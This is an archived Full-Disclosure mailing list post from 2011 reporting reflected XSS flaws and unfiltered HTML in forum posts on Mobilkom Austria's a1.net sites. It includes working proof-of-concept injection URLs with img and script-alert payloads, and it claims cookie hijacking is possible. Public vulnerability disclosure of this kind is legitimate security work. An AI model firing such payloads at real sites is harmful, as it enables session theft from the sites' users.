| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 12 Jul 2011 12:39:21 +0200
From: bosti.be@...h.com
To: full-disclosure@...ts.grok.org.uk
Subject: Mobilkom Austria XSSes
G'Day Ladies and Gents,
it has been already over 3 weeks now, since they've told me they're
going to fix this flaws, as soon as they've resolved more important
tasks... I think they had enough time, so here is my first
disclosure.
Just a little, not that important non-persistent XSS. Cookie
hijacking possible:
http://www.a1.net/forum/?module=mkaSearch&action=search&wo=-
1&search_eforum=<img src=http://wtfhub.com/wp-
content/uploads/2010/12/y-u-no-template1.jpg>
===========================
It gets funnier. They even DO allow HTML in a posting or thread.
http://www.a1.net/forum/mkaPosts/insert/2207.page
Proof: http://i.imgur.com/0h5IM.jpg
===========================
As you can see in the Screenshot, they even allow HTML in your
Signature.
And yet another non-persistent XSS (search form), Cookie hijacking
possible:
http://www.a1.net/musikfreizeichen/index.htm?action=browseSearchResu
lt&exact=false&searchString=<script>alert("wat")</script>
===========================
some fun: http://i.imgur.com/1F141.png
and even more: http://i.imgur.com/GMqcm.png
First disclosure, keep that in mind. Now let's hope they fix the
flaws soon. And btw, I also know they're not critical, so don't
bitch about it.
Greets,
HypoX
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists